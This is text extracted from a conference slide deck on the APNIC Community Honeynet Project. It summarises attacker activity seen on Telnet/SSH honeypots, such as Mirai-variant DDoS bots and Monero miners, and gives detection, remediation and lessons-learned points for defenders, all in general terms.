2. 3
Introduction
1. Observations from APNIC
Community Honeynet Project
2. Detection and Remediation
3. Lessons Learned
Let’s Connect!
o Adli Wahid
o @adliwahid
3. 4
4
APNIC Community Honeynet Project
• Learning & Information Sharing
– DASH https://dash.apnic.net
– Security Community / CERTs/CSIRTs
– Collaboration with partners
• Highlights
– Telnet / SSH honeypots
– Port 23 / 22 Exposed on the Internet
– Emulate Telnet/SSH services + interaction
4. 5
So What?
• Honeypots have no production value,
any traffic is suspect
– Useful for internal network
monitoring / detection
• Malware spreads via Telnet/SSH
– telnet/ssh enabled by default by
many systems and devices
– Exposed on the Internet
• Exploit weak authentication or default
authentication
– Since forever :-)
• What happens after a ‘successful login’
provides a bigger picture.
Activities in the last 24 hours
5. 6
Highlights
DDOS Agents / Stressers
• Drops script that downloads ELF binaries
– Different architectures available (x86,
x86_64, mips, sparc, etc)
– Mirai variant
• Perl scripts / bots
• Connects to mothership (command and
control)
• Waits for further instruction to ddos
• End goal – part of ddos
botnet/stresser/booter service, $$
– https://www.imperva.com/learn/ddos/booters-
stressers-ddosers/
Coin Miners (Monero/XMR)
• Drops script that download ELF binaries
(i.e. xmrig) or some other scripts
• Starts mining
• Sends results to mining pool
• End goal - part of mining botnet, $$
– https://www.zdnet.com/article/cyber-attackers-
are-cashing-in-on-cryptocurrency-mining-but-
heres-why-theyre-avoiding-bitcoin/
8. 9
9
Detection & Remediation
• Detection is quite straight forward*
– Spreading via telnet/ssh bruteforce
– Monitor activities on hosts / outbound activities
– OSINT information abound for context (virustotal,dshield,
etc)
• Remediation
– Types of devices already infected
– Capabilities in removing malicious codes & hardening
– Patch not available
– Work-arounds*
• Remediation II
– Actors’ infrastructure (dns, hosts, network) serving malware
and providing command and control
9. 10
10
Lessons Learned
• Lack of visibility, no monitoring, not monitoring things that
matter*
– All levels
– Threat sharing platform / OSINT / free feeds (i.e Shadowserver) can
provide context
• Lack of awareness*
– We deal with APT / ”Big Ddos Attacks” only
– Attackers build their infrastructure to carry out the “big attacks”
– ”It doesn’t affect us” syndrome
– Security specialization
• Lack of resources
– Responsive mode
– No remediation & proactive security (including reviewing security
policy)
One of the recent Linux backdoor/trojan
campaigns – spread over time
10. 11
11
Conclusion
• Snap-shot, there’s more!
– Malware spreads via other means
– Different payloads
• Collaboration – with clear goals
– Capability and capacity
• APNIC Community Honeynet Project
– MISP feeds, analysis etc,
– Let’s chat